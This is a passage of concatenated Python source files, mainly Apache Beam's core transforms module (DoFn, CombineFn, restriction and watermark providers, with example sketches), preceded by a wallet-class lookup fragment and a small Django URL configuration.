return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise RuntimeError("Unknown wallet type: " + str(wallet_type))
|
py | b415a063d0e3771167fcfd4e3d7aba524f3c5b93 | from django.urls import path
from . import views
urlpatterns = [
path('<int:pk>', views.Inscribete.as_view(), name='inscribete')
]
|
py | b415a289bbbdf907a2d7c2e297e1a6cc5dffd0ea | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Core PTransform subclasses, such as FlatMap, GroupByKey, and Map."""
# pytype: skip-file
from __future__ import absolute_import
import copy
import inspect
import logging
import random
import types
import typing
from builtins import map
from builtins import object
from builtins import range
from past.builtins import unicode
from apache_beam import coders
from apache_beam import pvalue
from apache_beam import typehints
from apache_beam.coders import typecoders
from apache_beam.internal import pickler
from apache_beam.internal import util
from apache_beam.options.pipeline_options import TypeOptions
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.transforms import ptransform
from apache_beam.transforms import userstate
from apache_beam.transforms.display import DisplayDataItem
from apache_beam.transforms.display import HasDisplayData
from apache_beam.transforms.ptransform import PTransform
from apache_beam.transforms.ptransform import PTransformWithSideInputs
from apache_beam.transforms.sideinputs import get_sideinput_index
from apache_beam.transforms.userstate import StateSpec
from apache_beam.transforms.userstate import TimerSpec
from apache_beam.transforms.window import GlobalWindows
from apache_beam.transforms.window import TimestampCombiner
from apache_beam.transforms.window import TimestampedValue
from apache_beam.transforms.window import WindowedValue
from apache_beam.transforms.window import WindowFn
from apache_beam.typehints import trivial_inference
from apache_beam.typehints.decorators import TypeCheckError
from apache_beam.typehints.decorators import WithTypeHints
from apache_beam.typehints.decorators import get_signature
from apache_beam.typehints.decorators import get_type_hints
from apache_beam.typehints.decorators import with_input_types
from apache_beam.typehints.decorators import with_output_types
from apache_beam.typehints.trivial_inference import element_type
from apache_beam.typehints.typehints import is_consistent_with
from apache_beam.utils import urns
from apache_beam.utils.timestamp import Duration
if typing.TYPE_CHECKING:
from google.protobuf import message # pylint: disable=ungrouped-imports
from apache_beam.io import iobase
from apache_beam.pipeline import Pipeline
from apache_beam.runners.pipeline_context import PipelineContext
from apache_beam.transforms import create_source
from apache_beam.transforms.trigger import AccumulationMode
from apache_beam.transforms.trigger import DefaultTrigger
from apache_beam.transforms.trigger import TriggerFn
try:
import funcsigs # Python 2 only.
except ImportError:
funcsigs = None
__all__ = [
'DoFn',
'CombineFn',
'PartitionFn',
'ParDo',
'FlatMap',
'FlatMapTuple',
'Map',
'MapTuple',
'Filter',
'CombineGlobally',
'CombinePerKey',
'CombineValues',
'GroupByKey',
'Partition',
'Windowing',
'WindowInto',
'Flatten',
'Create',
'Impulse',
'RestrictionProvider',
'WatermarkEstimatorProvider',
]
# Type variables
T = typing.TypeVar('T')
K = typing.TypeVar('K')
V = typing.TypeVar('V')
_LOGGER = logging.getLogger(__name__)
class DoFnContext(object):
"""A context available to all methods of DoFn instance."""
pass
class DoFnProcessContext(DoFnContext):
"""A processing context passed to DoFn process() during execution.
Experimental; no backwards-compatibility guarantees.
Most importantly, a DoFn.process method will access context.element
to get the element it is supposed to process.
Attributes:
label: label of the ParDo whose element is being processed.
element: element being processed
(in process method only; always None in start_bundle and finish_bundle)
timestamp: timestamp of the element
(in process method only; always None in start_bundle and finish_bundle)
windows: windows of the element
(in process method only; always None in start_bundle and finish_bundle)
state: a DoFnState object, which holds the runner's internal state
for this element.
Not used by the pipeline code.
"""
def __init__(self, label, element=None, state=None):
"""Initialize a processing context object with an element and state.
The element represents one value from a PCollection that will be accessed
by a DoFn object during pipeline execution, and state is an arbitrary object
where counters and other pipeline state information can be passed in.
DoFnProcessContext objects are also used as inputs to PartitionFn instances.
Args:
label: label of the PCollection whose element is being processed.
element: element of a PCollection being processed using this context.
state: a DoFnState object with state to be passed in to the DoFn object.
"""
self.label = label
self.state = state
if element is not None:
self.set_element(element)
def set_element(self, windowed_value):
if windowed_value is None:
# Not currently processing an element.
if hasattr(self, 'element'):
del self.element
del self.timestamp
del self.windows
else:
self.element = windowed_value.value
self.timestamp = windowed_value.timestamp
self.windows = windowed_value.windows
class ProcessContinuation(object):
"""An object that may be produced as the last element of a process method
invocation.
Experimental; no backwards-compatibility guarantees.
If produced, indicates that there is more work to be done for the current
input element.
"""
def __init__(self, resume_delay=0):
"""Initializes a ProcessContinuation object.
Args:
resume_delay: indicates the minimum time, in seconds, that should elapse
before re-invoking process() method for resuming the invocation of the
current element.
"""
self.resume_delay = resume_delay
@staticmethod
def resume(resume_delay=0):
"""A convenient method that produces a ``ProcessContinuation``.
Args:
resume_delay: delay after which processing current element should be
resumed.
Returns: a ``ProcessContinuation`` for signalling to the runner that the
current input element has not been fully processed and should be resumed later.
"""
return ProcessContinuation(resume_delay=resume_delay)
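# Illustrative sketch (comments only, not part of the upstream module): inside a
# Splittable DoFn, process() may emit a ProcessContinuation as its final value
# to ask the runner to resume the same element later. The names below
# (MyProvider, poll_records) are hypothetical:
#
#   def process(self, element, tracker=DoFn.RestrictionParam(MyProvider())):
#     for record in poll_records(element, tracker):
#       yield record
#     yield ProcessContinuation.resume(resume_delay=5)  # retry in ~5 seconds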
class RestrictionProvider(object):
"""Provides methods for generating and manipulating restrictions.
This class should be implemented to support Splittable ``DoFn`` in Python
SDK. See https://s.apache.org/splittable-do-fn for more details about
Splittable ``DoFn``.
To denote a ``DoFn`` class as a Splittable ``DoFn``, the ``DoFn.process()``
method of that class should have exactly one parameter whose default value is
an instance of ``RestrictionProvider``.
The provided ``RestrictionProvider`` instance must provide suitable overrides
for the following methods:
* create_tracker()
* initial_restriction()
Optionally, ``RestrictionProvider`` may override default implementations of
following methods:
* restriction_coder()
* restriction_size()
* split()
* split_and_size()
** Pausing and resuming processing of an element **
As the last element produced by the iterator returned by the
``DoFn.process()`` method, a Splittable ``DoFn`` may return an object of type
``ProcessContinuation``.
If provided, ``ProcessContinuation`` object specifies that runner should
later re-invoke ``DoFn.process()`` method to resume processing the current
element and the manner in which the re-invocation should be performed. A
``ProcessContinuation`` object must only be specified as the last element of
the iterator. If a ``ProcessContinuation`` object is not provided the runner
will assume that the current input element has been fully processed.
** Updating output watermark **
``DoFn.process()`` method of Splittable ``DoFn``s could contain a parameter
with default value ``DoFn.WatermarkReporterParam``. If specified this asks the
runner to provide a function that can be used to give the runner a
(best-effort) lower bound about the timestamps of future output associated
with the current element processed by the ``DoFn``. If the ``DoFn`` has
multiple outputs, the watermark applies to all of them. Provided function must
be invoked with a single parameter of type ``Timestamp`` or as an integer that
gives the watermark in number of seconds.
"""
def create_tracker(self, restriction):
# type: (...) -> iobase.RestrictionTracker
"""Produces a new ``RestrictionTracker`` for the given restriction.
This API is required to be implemented.
Args:
restriction: an object that defines a restriction as identified by a
Splittable ``DoFn`` that utilizes the current ``RestrictionProvider``.
For example, a tuple that gives a range of positions for a Splittable
``DoFn`` that reads files based on byte positions.
Returns: an object of type ``RestrictionTracker``.
"""
raise NotImplementedError
def initial_restriction(self, element):
"""Produces an initial restriction for the given element.
This API is required to be implemented.
"""
raise NotImplementedError
def split(self, element, restriction):
"""Splits the given element and restriction.
Returns an iterator of restrictions. The total set of elements produced by
reading input element for each of the returned restrictions should be the
same as the total set of elements produced by reading the input element for
the input restriction.
This API is optional if ``split_and_size`` has been implemented.
"""
yield restriction
def restriction_coder(self):
"""Returns a ``Coder`` for restrictions.
The returned ``Coder`` will be used for the restrictions produced by the current
``RestrictionProvider``.
Returns:
an object of type ``Coder``.
"""
return coders.registry.get_coder(object)
def restriction_size(self, element, restriction):
"""Returns the size of an element with respect to the given element.
By default, asks a newly-created restriction tracker for the default size
of the restriction.
This API is required to be implemented.
"""
raise NotImplementedError
def split_and_size(self, element, restriction):
"""Like split, but also does sizing, returning (restriction, size) pairs.
This API is optional if ``split`` and ``restriction_size`` have been
implemented.
"""
for part in self.split(element, restriction):
yield part, self.restriction_size(element, part)
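# Illustrative sketch (not part of the upstream module): a minimal
# RestrictionProvider for elements assumed to carry an integer ``size``
# attribute. It leans on the OffsetRange / OffsetRestrictionTracker helpers
# from apache_beam.io.restriction_trackers; the imports are deferred to the
# method bodies to stay clear of import cycles with apache_beam.io.
class _ExampleOffsetRestrictionProvider(RestrictionProvider):
  def initial_restriction(self, element):
    # One restriction covering the whole element: the offset range [0, size).
    from apache_beam.io.restriction_trackers import OffsetRange
    return OffsetRange(0, element.size)
  def create_tracker(self, restriction):
    from apache_beam.io.restriction_trackers import OffsetRestrictionTracker
    return OffsetRestrictionTracker(restriction)
  def restriction_size(self, element, restriction):
    # OffsetRange.size() is simply stop - start.
    return restriction.size()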
def get_function_arguments(obj, func):
# type: (...) -> typing.Tuple[typing.List[str], typing.List[typing.Any]]
"""Return the function arguments based on the name provided. If they have
a _inspect_function attached to the class then use that otherwise default
to the modified version of python inspect library.
Returns:
Same as get_function_args_defaults.
"""
func_name = '_inspect_%s' % func
if hasattr(obj, func_name):
f = getattr(obj, func_name)
return f()
f = getattr(obj, func)
return get_function_args_defaults(f)
def get_function_args_defaults(f):
# type: (...) -> typing.Tuple[typing.List[str], typing.List[typing.Any]]
"""Returns the function arguments of a given function.
Returns:
(args: List[str], defaults: List[Any]). The first list names the
arguments of the method and the second one has the values of the default
arguments. This is similar to ``inspect.getfullargspec()``'s results, except
it doesn't include bound arguments and may follow function wrappers.
"""
signature = get_signature(f)
# Fall back on funcsigs if inspect module doesn't have 'Parameter'; prefer
# inspect.Parameter over funcsigs.Parameter if both are available.
try:
parameter = inspect.Parameter
except AttributeError:
parameter = funcsigs.Parameter
# TODO(BEAM-5878) support kwonlyargs on Python 3.
_SUPPORTED_ARG_TYPES = [
parameter.POSITIONAL_ONLY, parameter.POSITIONAL_OR_KEYWORD
]
args = [
name for name,
p in signature.parameters.items() if p.kind in _SUPPORTED_ARG_TYPES
]
defaults = [
p.default for p in signature.parameters.values()
if p.kind in _SUPPORTED_ARG_TYPES and p.default is not p.empty
]
return args, defaults
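# Illustrative sketch (comments only): for a callable such as
# ``lambda x, y=1: None`` this helper returns (['x', 'y'], [1]) -- the
# positional argument names first, then the default values of the trailing
# arguments that declare them.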
class RunnerAPIPTransformHolder(PTransform):
"""A `PTransform` that holds a runner API `PTransform` proto.
This is used for transforms, for which corresponding objects
cannot be initialized in Python SDK. For example, for `ParDo` transforms for
remote SDKs that may be available in Python SDK transform graph when expanding
a cross-language transform since a Python `ParDo` object cannot be generated
without a serialized Python `DoFn` object.
"""
def __init__(self, proto, context):
self._proto = proto
self._context = context
def proto(self):
"""Runner API payload for a `PTransform`"""
return self._proto
def to_runner_api(self, context, has_parts=False):
# TODO(BEAM-7850): no need to copy around Environment if it is a direct
# attribute of PTransform.
id_to_proto_map = self._context.environments.get_id_to_proto_map()
for env_id in id_to_proto_map:
if env_id not in context.environments:
context.environments.put_proto(env_id, id_to_proto_map[env_id])
else:
env1 = id_to_proto_map[env_id]
env2 = context.environments[env_id]
assert env1.urn == env2.to_runner_api(context).urn, (
'Expected environments with the same ID to be equal but received '
'environments with different URNs '
'%r and %r',
env1.urn, env2.to_runner_api(context).urn)
assert env1.payload == env2.to_runner_api(context).payload, (
'Expected environments with the same ID to be equal but received '
'environments with different payloads '
'%r and %r',
env1.payload, env2.to_runner_api(context).payload)
return self._proto
def get_restriction_coder(self):
# TODO(BEAM-7172): support external transforms that are SDFs.
return None
class WatermarkEstimatorProvider(object):
"""Provides methods for generating WatermarkEstimator.
This class should be implemented if you want to provide output_watermark
information within an SDF.
To give an SDF.process() method access to a WatermarkEstimator, the SDF
author should declare a parameter whose default value is a
DoFn.WatermarkEstimatorParam constructed with a WatermarkEstimatorProvider
instance.
"""
def initial_estimator_state(self, element, restriction):
"""Returns the initial state of the WatermarkEstimator with given element
and restriction.
This function is called by the system.
"""
raise NotImplementedError
def create_watermark_estimator(self, estimator_state):
"""Create a new WatermarkEstimator based on the state. The state is
typically useful when resuming processing an element.
"""
raise NotImplementedError
def estimator_state_coder(self):
return coders.registry.get_coder(object)
class _DoFnParam(object):
"""DoFn parameter."""
def __init__(self, param_id):
self.param_id = param_id
def __eq__(self, other):
if type(self) == type(other):
return self.param_id == other.param_id
return False
def __ne__(self, other):
# TODO(BEAM-5949): Needed for Python 2 compatibility.
return not self == other
def __hash__(self):
return hash(self.param_id)
def __repr__(self):
return self.param_id
class _RestrictionDoFnParam(_DoFnParam):
"""Restriction Provider DoFn parameter."""
def __init__(self, restriction_provider):
# type: (RestrictionProvider) -> None
if not isinstance(restriction_provider, RestrictionProvider):
raise ValueError(
'DoFn.RestrictionParam expected RestrictionProvider object.')
self.restriction_provider = restriction_provider
self.param_id = (
'RestrictionParam(%s)' % restriction_provider.__class__.__name__)
class _StateDoFnParam(_DoFnParam):
"""State DoFn parameter."""
def __init__(self, state_spec):
# type: (StateSpec) -> None
if not isinstance(state_spec, StateSpec):
raise ValueError("DoFn.StateParam expected StateSpec object.")
self.state_spec = state_spec
self.param_id = 'StateParam(%s)' % state_spec.name
class _TimerDoFnParam(_DoFnParam):
"""Timer DoFn parameter."""
def __init__(self, timer_spec):
# type: (TimerSpec) -> None
if not isinstance(timer_spec, TimerSpec):
raise ValueError("DoFn.TimerParam expected TimerSpec object.")
self.timer_spec = timer_spec
self.param_id = 'TimerParam(%s)' % timer_spec.name
class _BundleFinalizerParam(_DoFnParam):
"""Bundle Finalization DoFn parameter."""
def __init__(self):
self._callbacks = []
self.param_id = "FinalizeBundle"
def register(self, callback):
self._callbacks.append(callback)
# Log errors when calling callback to make sure all callbacks get called
# though there are errors. And errors should not fail pipeline.
def finalize_bundle(self):
for callback in self._callbacks:
try:
callback()
except Exception as e:
_LOGGER.warning("Got exception from finalization call: %s", e)
def has_callbacks(self):
return len(self._callbacks) > 0
def reset(self):
del self._callbacks[:]
class _WatermarkEstimatorParam(_DoFnParam):
"""WatermarkEstomator DoFn parameter."""
def __init__(self, watermark_estimator_provider):
# type: (WatermarkEstimatorProvider) -> None
if not isinstance(watermark_estimator_provider, WatermarkEstimatorProvider):
raise ValueError(
'DoFn._WatermarkEstimatorParam expected'
'WatermarkEstimatorProvider object.')
self.watermark_estimator_provider = watermark_estimator_provider
self.param_id = 'WatermarkEstimatorProvider'
class DoFn(WithTypeHints, HasDisplayData, urns.RunnerApiFn):
"""A function object used by a transform with custom processing.
The ParDo transform is such a transform. The ParDo.apply
method will take an object of type DoFn and apply it to all elements of a
PCollection object.
In order to have concrete DoFn objects one has to subclass from DoFn and
define the desired behavior (start_bundle/finish_bundle and process) or wrap a
callable object using the CallableWrapperDoFn class.
"""
# Parameters that can be used in the .process() method.
ElementParam = _DoFnParam('ElementParam')
SideInputParam = _DoFnParam('SideInputParam')
TimestampParam = _DoFnParam('TimestampParam')
WindowParam = _DoFnParam('WindowParam')
PaneInfoParam = _DoFnParam('PaneInfoParam')
WatermarkEstimatorParam = _WatermarkEstimatorParam
BundleFinalizerParam = _BundleFinalizerParam
KeyParam = _DoFnParam('KeyParam')
# Parameters to access state and timers. Not restricted to use only in the
# .process() method. Usage: DoFn.StateParam(state_spec),
# DoFn.TimerParam(timer_spec), DoFn.TimestampParam, DoFn.WindowParam,
# DoFn.KeyParam
StateParam = _StateDoFnParam
TimerParam = _TimerDoFnParam
DoFnProcessParams = [
ElementParam,
SideInputParam,
TimestampParam,
WindowParam,
WatermarkEstimatorParam,
PaneInfoParam,
BundleFinalizerParam,
KeyParam,
StateParam,
TimerParam
]
RestrictionParam = _RestrictionDoFnParam
@staticmethod
def from_callable(fn):
return CallableWrapperDoFn(fn)
def default_label(self):
return self.__class__.__name__
def process(self, element, *args, **kwargs):
"""Method to use for processing elements.
This is invoked by ``DoFnRunner`` for each element of an input
``PCollection``.
If specified, following default arguments are used by the ``DoFnRunner`` to
be able to pass the parameters correctly.
``DoFn.ElementParam``: element to be processed, should not be mutated.
``DoFn.SideInputParam``: a side input that may be used when processing.
``DoFn.TimestampParam``: timestamp of the input element.
``DoFn.WindowParam``: ``Window`` the input element belongs to.
``DoFn.TimerParam``: a ``userstate.RuntimeTimer`` object defined by the spec
of the parameter.
``DoFn.StateParam``: a ``userstate.RuntimeState`` object defined by the spec
of the parameter.
``DoFn.KeyParam``: key associated with the element.
``DoFn.RestrictionParam``: an ``iobase.RestrictionTracker`` will be
provided here to allow treatment as a Splittable ``DoFn``. The restriction
tracker will be derived from the restriction provider in the parameter.
``DoFn.WatermarkEstimatorParam``: a function that can be used to track
output watermark of Splittable ``DoFn`` implementations.
Args:
element: The element to be processed
*args: side inputs
**kwargs: other keyword arguments.
Returns:
An Iterable of output elements or None.
"""
raise NotImplementedError
def setup(self):
"""Called to prepare an instance for processing bundles of elements.
This is a good place to initialize transient in-memory resources, such as
network connections. The resources can then be disposed in
``DoFn.teardown``.
"""
pass
def start_bundle(self):
"""Called before a bundle of elements is processed on a worker.
Elements to be processed are split into bundles and distributed
to workers. Before a worker calls process() on the first element
of its bundle, it calls this method.
"""
pass
def finish_bundle(self):
"""Called after a bundle of elements is processed on a worker.
"""
pass
def teardown(self):
"""Called to use to clean up this instance before it is discarded.
A runner will do its best to call this method on any given instance to
prevent leaks of transient resources, however, there may be situations where
this is impossible (e.g. process crash, hardware failure, etc.) or
unnecessary (e.g. the pipeline is shutting down and the process is about to
be killed anyway, so all transient resources will be released automatically
by the OS). In these cases, the call may not happen. It will also not be
retried, because in such situations the DoFn instance no longer exists, so
there's no instance to retry it on.
Thus, all work that depends on input elements, and all externally important
side effects, must be performed in ``DoFn.process`` or
``DoFn.finish_bundle``.
"""
pass
def get_function_arguments(self, func):
return get_function_arguments(self, func)
def default_type_hints(self):
fn_type_hints = typehints.decorators.IOTypeHints.from_callable(self.process)
if fn_type_hints is not None:
try:
fn_type_hints = fn_type_hints.strip_iterable()
except ValueError as e:
raise ValueError('Return value not iterable: %s: %s' % (self, e))
# Prefer class decorator type hints for backwards compatibility.
return get_type_hints(self.__class__).with_defaults(fn_type_hints)
# TODO(sourabhbajaj): Do we want to remove the responsibility of these from
# the DoFn or maybe the runner
def infer_output_type(self, input_type):
# TODO(BEAM-8247): Side inputs types.
# TODO(robertwb): Assert compatibility with input type hint?
return self._strip_output_annotations(
trivial_inference.infer_return_type(self.process, [input_type]))
def _strip_output_annotations(self, type_hint):
annotations = (TimestampedValue, WindowedValue, pvalue.TaggedOutput)
# TODO(robertwb): These should be parameterized types that the
# type inferencer understands.
if (type_hint in annotations or
trivial_inference.element_type(type_hint) in annotations):
return typehints.Any
return type_hint
def _process_argspec_fn(self):
"""Returns the Python callable that will eventually be invoked.
This should ideally be the user-level function that is called with
the main and (if any) side inputs, and is used to relate the type
hint parameters with the input parameters (e.g., by argument name).
"""
return self.process
urns.RunnerApiFn.register_pickle_urn(python_urns.PICKLED_DOFN)
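# Illustrative sketch (not part of the upstream module): a concrete DoFn that
# uses the parameter defaults documented in DoFn.process() to receive each
# element's timestamp alongside the element itself.
class _ExampleTimestampedWordsDoFn(DoFn):
  """Example only: emits (word, timestamp) pairs for each word in a line."""
  def process(self, element, timestamp=DoFn.TimestampParam):
    for word in element.split():
      yield word, timestamp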
def _fn_takes_side_inputs(fn):
try:
signature = get_signature(fn)
except TypeError:
# We can't tell; maybe it does.
return True
return (
len(signature.parameters) > 1 or any(
p.kind == p.VAR_POSITIONAL or p.kind == p.VAR_KEYWORD
for p in signature.parameters.values()))
class CallableWrapperDoFn(DoFn):
"""For internal use only; no backwards-compatibility guarantees.
A DoFn (function) object wrapping a callable object.
The purpose of this class is to conveniently wrap simple functions and use
them in transforms.
"""
def __init__(self, fn, fullargspec=None):
"""Initializes a CallableWrapperDoFn object wrapping a callable.
Args:
fn: A callable object.
Raises:
TypeError: if fn parameter is not a callable type.
"""
if not callable(fn):
raise TypeError('Expected a callable object instead of: %r' % fn)
self._fn = fn
self._fullargspec = fullargspec
if isinstance(
fn, (types.BuiltinFunctionType, types.MethodType, types.FunctionType)):
self.process = fn
else:
# For cases such as set / list where fn is callable but not a function
self.process = lambda element: fn(element)
super(CallableWrapperDoFn, self).__init__()
def display_data(self):
# If the callable has a name, then it's likely a function, and
# we show its name.
# Otherwise, it might be an instance of a callable class. We
# show its class.
display_data_value = (
self._fn.__name__
if hasattr(self._fn, '__name__') else self._fn.__class__)
return {
'fn': DisplayDataItem(display_data_value, label='Transform Function')
}
def __repr__(self):
return 'CallableWrapperDoFn(%s)' % self._fn
def default_type_hints(self):
fn_type_hints = typehints.decorators.IOTypeHints.from_callable(self._fn)
type_hints = get_type_hints(self._fn).with_defaults(fn_type_hints)
# The fn's output type should be iterable. Strip off the outer
# container type due to the 'flatten' portion of FlatMap/ParDo.
try:
type_hints = type_hints.strip_iterable()
except ValueError as e:
# TODO(BEAM-8466): Raise exception here if using stricter type checking.
_LOGGER.warning('%s: %s', self.display_data()['fn'].value, e)
return type_hints
def infer_output_type(self, input_type):
return self._strip_output_annotations(
trivial_inference.infer_return_type(self._fn, [input_type]))
def _process_argspec_fn(self):
return getattr(self._fn, '_argspec_fn', self._fn)
def _inspect_process(self):
if self._fullargspec:
return self._fullargspec
else:
return get_function_args_defaults(self._process_argspec_fn())
class CombineFn(WithTypeHints, HasDisplayData, urns.RunnerApiFn):
"""A function object used by a Combine transform with custom processing.
A CombineFn specifies how multiple values in all or part of a PCollection can
be merged into a single value---essentially providing the same kind of
information as the arguments to the Python "reduce" builtin (except for the
input argument, which is an instance of CombineFnProcessContext). The
combining process proceeds as follows:
1. Input values are partitioned into one or more batches.
2. For each batch, the create_accumulator method is invoked to create a fresh
initial "accumulator" value representing the combination of zero values.
3. For each input value in the batch, the add_input method is invoked to
combine more values with the accumulator for that batch.
4. The merge_accumulators method is invoked to combine accumulators from
separate batches into a single combined output accumulator value, once all
of the accumulators have had all the input value in their batches added to
them. This operation is invoked repeatedly, until there is only one
accumulator value left.
5. The extract_output operation is invoked on the final accumulator to get
the output value.
Note: If this **CombineFn** is used with a transform that has defaults,
**apply** will be called with an empty list at expansion time to get the
default value.
"""
def default_label(self):
return self.__class__.__name__
def create_accumulator(self, *args, **kwargs):
"""Return a fresh, empty accumulator for the combine operation.
Args:
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
raise NotImplementedError(str(self))
def add_input(self, mutable_accumulator, element, *args, **kwargs):
"""Return result of folding element into accumulator.
CombineFn implementors must override add_input.
Args:
mutable_accumulator: the current accumulator,
may be modified and returned for efficiency
element: the element to add, should not be mutated
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
raise NotImplementedError(str(self))
def add_inputs(self, mutable_accumulator, elements, *args, **kwargs):
"""Returns the result of folding each element in elements into accumulator.
This is provided in case the implementation affords more efficient
bulk addition of elements. The default implementation simply loops
over the inputs invoking add_input for each one.
Args:
mutable_accumulator: the current accumulator,
may be modified and returned for efficiency
elements: the elements to add, should not be mutated
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
for element in elements:
mutable_accumulator =\
self.add_input(mutable_accumulator, element, *args, **kwargs)
return mutable_accumulator
def merge_accumulators(self, accumulators, *args, **kwargs):
"""Returns the result of merging several accumulators
to a single accumulator value.
Args:
accumulators: the accumulators to merge.
Only the first accumulator may be modified and returned for efficiency;
the other accumulators should not be mutated, because they may be
shared with other code and mutating them could lead to incorrect
results or data corruption.
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
raise NotImplementedError(str(self))
def compact(self, accumulator, *args, **kwargs):
"""Optionally returns a more compact represenation of the accumulator.
This is called before an accumulator is sent across the wire, and can
be useful in cases where values are buffered or otherwise lazily
kept unprocessed when added to the accumulator. Should return an
equivalent, though possibly modified, accumulator.
By default returns the accumulator unmodified.
Args:
accumulator: the current accumulator
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
return accumulator
def extract_output(self, accumulator, *args, **kwargs):
"""Return result of converting accumulator into the output value.
Args:
accumulator: the final accumulator value computed by this CombineFn
for the entire input key or PCollection. Can be modified for
efficiency.
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
raise NotImplementedError(str(self))
def apply(self, elements, *args, **kwargs):
"""Returns result of applying this CombineFn to the input values.
Args:
elements: the set of values to combine.
*args: Additional arguments and side inputs.
**kwargs: Additional arguments and side inputs.
"""
return self.extract_output(
self.add_inputs(
self.create_accumulator(*args, **kwargs), elements, *args,
**kwargs),
*args,
**kwargs)
def for_input_type(self, input_type):
"""Returns a specialized implementation of self, if it exists.
Otherwise, returns self.
Args:
input_type: the type of input elements.
"""
return self
@staticmethod
def from_callable(fn):
return CallableWrapperCombineFn(fn)
@staticmethod
def maybe_from_callable(fn, has_side_inputs=True):
# type: (typing.Union[CombineFn, typing.Callable], bool) -> CombineFn
if isinstance(fn, CombineFn):
return fn
elif callable(fn) and not has_side_inputs:
return NoSideInputsCallableWrapperCombineFn(fn)
elif callable(fn):
return CallableWrapperCombineFn(fn)
else:
raise TypeError('Expected a CombineFn or callable, got %r' % fn)
def get_accumulator_coder(self):
return coders.registry.get_coder(object)
urns.RunnerApiFn.register_pickle_urn(python_urns.PICKLED_COMBINE_FN)
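# Illustrative sketch (not part of the upstream module): a CombineFn computing
# an arithmetic mean, following the create / add / merge / extract life cycle
# described in the CombineFn docstring. The accumulator is a (sum, count) pair.
class _ExampleMeanCombineFn(CombineFn):
  def create_accumulator(self):
    return 0.0, 0
  def add_input(self, mutable_accumulator, element):
    total, count = mutable_accumulator
    return total + element, count + 1
  def merge_accumulators(self, accumulators):
    totals, counts = zip(*accumulators)
    return sum(totals), sum(counts)
  def extract_output(self, accumulator):
    total, count = accumulator
    return total / count if count else float('NaN')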
class _ReiterableChain(object):
"""Like itertools.chain, but allowing re-iteration."""
def __init__(self, iterables):
self.iterables = iterables
def __iter__(self):
for iterable in self.iterables:
for item in iterable:
yield item
def __bool__(self):
for iterable in self.iterables:
for _ in iterable:
return True
return False
class CallableWrapperCombineFn(CombineFn):
"""For internal use only; no backwards-compatibility guarantees.
A CombineFn (function) object wrapping a callable object.
The purpose of this class is to conveniently wrap simple functions and use
them in Combine transforms.
"""
_DEFAULT_BUFFER_SIZE = 10
def __init__(self, fn, buffer_size=_DEFAULT_BUFFER_SIZE):
"""Initializes a CallableFn object wrapping a callable.
Args:
fn: A callable object that reduces elements of an iterable to a single
value (like the builtins sum and max). This callable must be capable of
receiving the kind of values it generates as output in its input, and
for best results, its operation must be commutative and associative.
Raises:
TypeError: if fn parameter is not a callable type.
"""
if not callable(fn):
raise TypeError('Expected a callable object instead of: %r' % fn)
super(CallableWrapperCombineFn, self).__init__()
self._fn = fn
self._buffer_size = buffer_size
def display_data(self):
return {'fn_dd': self._fn}
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, self._fn)
def create_accumulator(self, *args, **kwargs):
return []
def add_input(self, accumulator, element, *args, **kwargs):
accumulator.append(element)
if len(accumulator) > self._buffer_size:
accumulator = [self._fn(accumulator, *args, **kwargs)]
return accumulator
def add_inputs(self, accumulator, elements, *args, **kwargs):
accumulator.extend(elements)
if len(accumulator) > self._buffer_size:
accumulator = [self._fn(accumulator, *args, **kwargs)]
return accumulator
def merge_accumulators(self, accumulators, *args, **kwargs):
return [self._fn(_ReiterableChain(accumulators), *args, **kwargs)]
def compact(self, accumulator, *args, **kwargs):
if len(accumulator) <= 1:
return accumulator
else:
return [self._fn(accumulator, *args, **kwargs)]
def extract_output(self, accumulator, *args, **kwargs):
return self._fn(accumulator, *args, **kwargs)
def default_type_hints(self):
fn_hints = get_type_hints(self._fn)
if fn_hints.input_types is None:
return fn_hints
else:
# fn(Iterable[V]) -> V becomes CombineFn(V) -> V
input_args, input_kwargs = fn_hints.input_types
if not input_args:
if len(input_kwargs) == 1:
input_args, input_kwargs = tuple(input_kwargs.values()), {}
else:
raise TypeError('Combiner input type must be specified positionally.')
if not is_consistent_with(input_args[0],
typehints.Iterable[typehints.Any]):
raise TypeCheckError(
'All functions for a Combine PTransform must accept a '
'single argument compatible with: Iterable[Any]. '
'Instead a function with input type: %s was received.' %
input_args[0])
input_args = (element_type(input_args[0]), ) + input_args[1:]
# TODO(robertwb): Assert output type is consistent with input type?
return fn_hints.with_input_types(*input_args, **input_kwargs)
def for_input_type(self, input_type):
# Avoid circular imports.
from apache_beam.transforms import cy_combiners
if self._fn is any:
return cy_combiners.AnyCombineFn()
elif self._fn is all:
return cy_combiners.AllCombineFn()
else:
known_types = {
(sum, int): cy_combiners.SumInt64Fn(),
(min, int): cy_combiners.MinInt64Fn(),
(max, int): cy_combiners.MaxInt64Fn(),
(sum, float): cy_combiners.SumFloatFn(),
(min, float): cy_combiners.MinFloatFn(),
(max, float): cy_combiners.MaxFloatFn(),
}
return known_types.get((self._fn, input_type), self)
class NoSideInputsCallableWrapperCombineFn(CallableWrapperCombineFn):
"""For internal use only; no backwards-compatibility guarantees.
A CombineFn (function) object wrapping a callable object with no side inputs.
This is identical to its parent, but avoids accepting and passing *args
and **kwargs for efficiency as they are known to be empty.
"""
def create_accumulator(self):
return []
def add_input(self, accumulator, element):
accumulator.append(element)
if len(accumulator) > self._buffer_size:
accumulator = [self._fn(accumulator)]
return accumulator
def add_inputs(self, accumulator, elements):
accumulator.extend(elements)
